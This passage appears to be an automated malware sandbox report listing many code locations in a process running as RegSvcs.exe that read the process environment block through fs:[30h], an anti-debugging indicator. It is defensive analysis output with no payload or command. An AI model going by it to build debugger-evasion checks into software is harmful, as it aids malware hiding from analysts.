                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FCE420 mov eax, dword ptr fs:[00000030h]10_2_00FCE420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FCE420 mov eax, dword ptr fs:[00000030h]10_2_00FCE420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100C5ED mov eax, dword ptr fs:[00000030h]10_2_0100C5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100C5ED mov eax, dword ptr fs:[00000030h]10_2_0100C5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01008402 mov eax, dword ptr fs:[00000030h]10_2_01008402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01008402 mov eax, dword ptr fs:[00000030h]10_2_01008402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01008402 mov eax, dword ptr fs:[00000030h]10_2_01008402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FFE5E7 mov eax, dword ptr fs:[00000030h]10_2_00FFE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FFE5E7 mov eax, dword ptr fs:[00000030h]10_2_00FFE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FFE5E7 mov eax, dword ptr fs:[00000030h]10_2_00FFE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FFE5E7 mov eax, dword ptr fs:[00000030h]10_2_00FFE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FFE5E7 mov eax, dword ptr fs:[00000030h]10_2_00FFE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FFE5E7 mov eax, dword ptr fs:[00000030h]10_2_00FFE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FFE5E7 mov eax, dword ptr fs:[00000030h]10_2_00FFE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FFE5E7 mov eax, dword ptr fs:[00000030h]10_2_00FFE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD25E0 mov eax, dword ptr fs:[00000030h]10_2_00FD25E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01056420 mov eax, dword ptr fs:[00000030h]10_2_01056420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01056420 mov eax, dword ptr fs:[00000030h]10_2_01056420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01056420 mov eax, dword ptr fs:[00000030h]10_2_01056420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01056420 mov eax, dword ptr fs:[00000030h]10_2_01056420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01056420 mov eax, dword ptr fs:[00000030h]10_2_01056420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01056420 mov eax, dword ptr fs:[00000030h]10_2_01056420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01056420 mov eax, dword ptr fs:[00000030h]10_2_01056420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD65D0 mov eax, dword ptr fs:[00000030h]10_2_00FD65D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100A430 mov eax, dword ptr fs:[00000030h]10_2_0100A430
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100E443 mov eax, dword ptr fs:[00000030h]10_2_0100E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100E443 mov eax, dword ptr fs:[00000030h]10_2_0100E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100E443 mov eax, dword ptr fs:[00000030h]10_2_0100E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100E443 mov eax, dword ptr fs:[00000030h]10_2_0100E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100E443 mov eax, dword ptr fs:[00000030h]10_2_0100E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100E443 mov eax, dword ptr fs:[00000030h]10_2_0100E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100E443 mov eax, dword ptr fs:[00000030h]10_2_0100E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100E443 mov eax, dword ptr fs:[00000030h]10_2_0100E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FF45B1 mov eax, dword ptr fs:[00000030h]10_2_00FF45B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FF45B1 mov eax, dword ptr fs:[00000030h]10_2_00FF45B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0105C460 mov ecx, dword ptr fs:[00000030h]10_2_0105C460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD2582 mov eax, dword ptr fs:[00000030h]10_2_00FD2582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD2582 mov ecx, dword ptr fs:[00000030h]10_2_00FD2582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD8550 mov eax, dword ptr fs:[00000030h]10_2_00FD8550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD8550 mov eax, dword ptr fs:[00000030h]10_2_00FD8550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010044B0 mov ecx, dword ptr fs:[00000030h]10_2_010044B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0105A4B0 mov eax, dword ptr fs:[00000030h]10_2_0105A4B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FFE53E mov eax, dword ptr fs:[00000030h]10_2_00FFE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FFE53E mov eax, dword ptr fs:[00000030h]10_2_00FFE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FFE53E mov eax, dword ptr fs:[00000030h]10_2_00FFE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FFE53E mov eax, dword ptr fs:[00000030h]10_2_00FFE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FFE53E mov eax, dword ptr fs:[00000030h]10_2_00FFE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE0535 mov eax, dword ptr fs:[00000030h]10_2_00FE0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE0535 mov eax, dword ptr fs:[00000030h]10_2_00FE0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE0535 mov eax, dword ptr fs:[00000030h]10_2_00FE0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE0535 mov eax, dword ptr fs:[00000030h]10_2_00FE0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE0535 mov eax, dword ptr fs:[00000030h]10_2_00FE0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE0535 mov eax, dword ptr fs:[00000030h]10_2_00FE0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100C700 mov eax, dword ptr fs:[00000030h]10_2_0100C700
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01000710 mov eax, dword ptr fs:[00000030h]10_2_01000710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100C720 mov eax, dword ptr fs:[00000030h]10_2_0100C720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100C720 mov eax, dword ptr fs:[00000030h]10_2_0100C720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0104C730 mov eax, dword ptr fs:[00000030h]10_2_0104C730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100273C mov eax, dword ptr fs:[00000030h]10_2_0100273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100273C mov ecx, dword ptr fs:[00000030h]10_2_0100273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100273C mov eax, dword ptr fs:[00000030h]10_2_0100273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100674D mov esi, dword ptr fs:[00000030h]10_2_0100674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100674D mov eax, dword ptr fs:[00000030h]10_2_0100674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100674D mov eax, dword ptr fs:[00000030h]10_2_0100674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01054755 mov eax, dword ptr fs:[00000030h]10_2_01054755
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01012750 mov eax, dword ptr fs:[00000030h]10_2_01012750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01012750 mov eax, dword ptr fs:[00000030h]10_2_01012750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0105E75D mov eax, dword ptr fs:[00000030h]10_2_0105E75D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD4690 mov eax, dword ptr fs:[00000030h]10_2_00FD4690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD4690 mov eax, dword ptr fs:[00000030h]10_2_00FD4690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0107678E mov eax, dword ptr fs:[00000030h]10_2_0107678E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FEC640 mov eax, dword ptr fs:[00000030h]10_2_00FEC640
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010507C3 mov eax, dword ptr fs:[00000030h]10_2_010507C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD262C mov eax, dword ptr fs:[00000030h]10_2_00FD262C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FEE627 mov eax, dword ptr fs:[00000030h]10_2_00FEE627
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0105E7E1 mov eax, dword ptr fs:[00000030h]10_2_0105E7E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE260B mov eax, dword ptr fs:[00000030h]10_2_00FE260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE260B mov eax, dword ptr fs:[00000030h]10_2_00FE260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE260B mov eax, dword ptr fs:[00000030h]10_2_00FE260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE260B mov eax, dword ptr fs:[00000030h]10_2_00FE260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE260B mov eax, dword ptr fs:[00000030h]10_2_00FE260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE260B mov eax, dword ptr fs:[00000030h]10_2_00FE260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE260B mov eax, dword ptr fs:[00000030h]10_2_00FE260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD47FB mov eax, dword ptr fs:[00000030h]10_2_00FD47FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD47FB mov eax, dword ptr fs:[00000030h]10_2_00FD47FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0104E609 mov eax, dword ptr fs:[00000030h]10_2_0104E609
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FF27ED mov eax, dword ptr fs:[00000030h]10_2_00FF27ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FF27ED mov eax, dword ptr fs:[00000030h]10_2_00FF27ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FF27ED mov eax, dword ptr fs:[00000030h]10_2_00FF27ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01012619 mov eax, dword ptr fs:[00000030h]10_2_01012619
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01006620 mov eax, dword ptr fs:[00000030h]10_2_01006620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01008620 mov eax, dword ptr fs:[00000030h]10_2_01008620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FDC7C0 mov eax, dword ptr fs:[00000030h]10_2_00FDC7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD07AF mov eax, dword ptr fs:[00000030h]10_2_00FD07AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100A660 mov eax, dword ptr fs:[00000030h]10_2_0100A660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100A660 mov eax, dword ptr fs:[00000030h]10_2_0100A660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0109866E mov eax, dword ptr fs:[00000030h]10_2_0109866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0109866E mov eax, dword ptr fs:[00000030h]10_2_0109866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01002674 mov eax, dword ptr fs:[00000030h]10_2_01002674
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD8770 mov eax, dword ptr fs:[00000030h]10_2_00FD8770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE0770 mov eax, dword ptr fs:[00000030h]10_2_00FE0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE0770 mov eax, dword ptr fs:[00000030h]10_2_00FE0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE0770 mov eax, dword ptr fs:[00000030h]10_2_00FE0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE0770 mov eax, dword ptr fs:[00000030h]10_2_00FE0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE0770 mov eax, dword ptr fs:[00000030h]10_2_00FE0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE0770 mov eax, dword ptr fs:[00000030h]10_2_00FE0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE0770 mov eax, dword ptr fs:[00000030h]10_2_00FE0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE0770 mov eax, dword ptr fs:[00000030h]10_2_00FE0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE0770 mov eax, dword ptr fs:[00000030h]10_2_00FE0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE0770 mov eax, dword ptr fs:[00000030h]10_2_00FE0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE0770 mov eax, dword ptr fs:[00000030h]10_2_00FE0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE0770 mov eax, dword ptr fs:[00000030h]10_2_00FE0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100C6A6 mov eax, dword ptr fs:[00000030h]10_2_0100C6A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD0750 mov eax, dword ptr fs:[00000030h]10_2_00FD0750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010066B0 mov eax, dword ptr fs:[00000030h]10_2_010066B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100A6C7 mov ebx, dword ptr fs:[00000030h]10_2_0100A6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100A6C7 mov eax, dword ptr fs:[00000030h]10_2_0100A6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD0710 mov eax, dword ptr fs:[00000030h]10_2_00FD0710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010506F1 mov eax, dword ptr fs:[00000030h]10_2_010506F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010506F1 mov eax, dword ptr fs:[00000030h]10_2_010506F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0104E6F2 mov eax, dword ptr fs:[00000030h]10_2_0104E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0104E6F2 mov eax, dword ptr fs:[00000030h]10_2_0104E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0104E6F2 mov eax, dword ptr fs:[00000030h]10_2_0104E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0104E6F2 mov eax, dword ptr fs:[00000030h]10_2_0104E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0104E908 mov eax, dword ptr fs:[00000030h]10_2_0104E908
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0104E908 mov eax, dword ptr fs:[00000030h]10_2_0104E908
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0105C912 mov eax, dword ptr fs:[00000030h]10_2_0105C912
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0106892B mov eax, dword ptr fs:[00000030h]10_2_0106892B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0105892A mov eax, dword ptr fs:[00000030h]10_2_0105892A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FFE8C0 mov eax, dword ptr fs:[00000030h]10_2_00FFE8C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01050946 mov eax, dword ptr fs:[00000030h]10_2_01050946
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0101096E mov eax, dword ptr fs:[00000030h]10_2_0101096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0101096E mov edx, dword ptr fs:[00000030h]10_2_0101096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0101096E mov eax, dword ptr fs:[00000030h]10_2_0101096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0105C97C mov eax, dword ptr fs:[00000030h]10_2_0105C97C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD0887 mov eax, dword ptr fs:[00000030h]10_2_00FD0887
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01074978 mov eax, dword ptr fs:[00000030h]10_2_01074978
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01074978 mov eax, dword ptr fs:[00000030h]10_2_01074978
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD4859 mov eax, dword ptr fs:[00000030h]10_2_00FD4859
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD4859 mov eax, dword ptr fs:[00000030h]10_2_00FD4859
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010589B3 mov esi, dword ptr fs:[00000030h]10_2_010589B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010589B3 mov eax, dword ptr fs:[00000030h]10_2_010589B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010589B3 mov eax, dword ptr fs:[00000030h]10_2_010589B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE2840 mov ecx, dword ptr fs:[00000030h]10_2_00FE2840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010669C0 mov eax, dword ptr fs:[00000030h]10_2_010669C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FF2835 mov eax, dword ptr fs:[00000030h]10_2_00FF2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FF2835 mov eax, dword ptr fs:[00000030h]10_2_00FF2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FF2835 mov eax, dword ptr fs:[00000030h]10_2_00FF2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FF2835 mov ecx, dword ptr fs:[00000030h]10_2_00FF2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FF2835 mov eax, dword ptr fs:[00000030h]10_2_00FF2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FF2835 mov eax, dword ptr fs:[00000030h]10_2_00FF2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010049D0 mov eax, dword ptr fs:[00000030h]10_2_010049D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0109A9D3 mov eax, dword ptr fs:[00000030h]10_2_0109A9D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0105E9E0 mov eax, dword ptr fs:[00000030h]10_2_0105E9E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010029F9 mov eax, dword ptr fs:[00000030h]10_2_010029F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010029F9 mov eax, dword ptr fs:[00000030h]10_2_010029F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0105C810 mov eax, dword ptr fs:[00000030h]10_2_0105C810
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FDA9D0 mov eax, dword ptr fs:[00000030h]10_2_00FDA9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FDA9D0 mov eax, dword ptr fs:[00000030h]10_2_00FDA9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FDA9D0 mov eax, dword ptr fs:[00000030h]10_2_00FDA9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FDA9D0 mov eax, dword ptr fs:[00000030h]10_2_00FDA9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FDA9D0 mov eax, dword ptr fs:[00000030h]10_2_00FDA9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FDA9D0 mov eax, dword ptr fs:[00000030h]10_2_00FDA9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100A830 mov eax, dword ptr fs:[00000030h]10_2_0100A830
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0107483A mov eax, dword ptr fs:[00000030h]10_2_0107483A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0107483A mov eax, dword ptr fs:[00000030h]10_2_0107483A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD09AD mov eax, dword ptr fs:[00000030h]10_2_00FD09AD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD09AD mov eax, dword ptr fs:[00000030h]10_2_00FD09AD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01000854 mov eax, dword ptr fs:[00000030h]10_2_01000854
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE29A0 mov eax, dword ptr fs:[00000030h]10_2_00FE29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE29A0 mov eax, dword ptr fs:[00000030h]10_2_00FE29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE29A0 mov eax, dword ptr fs:[00000030h]10_2_00FE29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE29A0 mov eax, dword ptr fs:[00000030h]10_2_00FE29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE29A0 mov eax, dword ptr fs:[00000030h]10_2_00FE29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE29A0 mov eax, dword ptr fs:[00000030h]10_2_00FE29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE29A0 mov eax, dword ptr fs:[00000030h]10_2_00FE29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE29A0 mov eax, dword ptr fs:[00000030h]10_2_00FE29A0
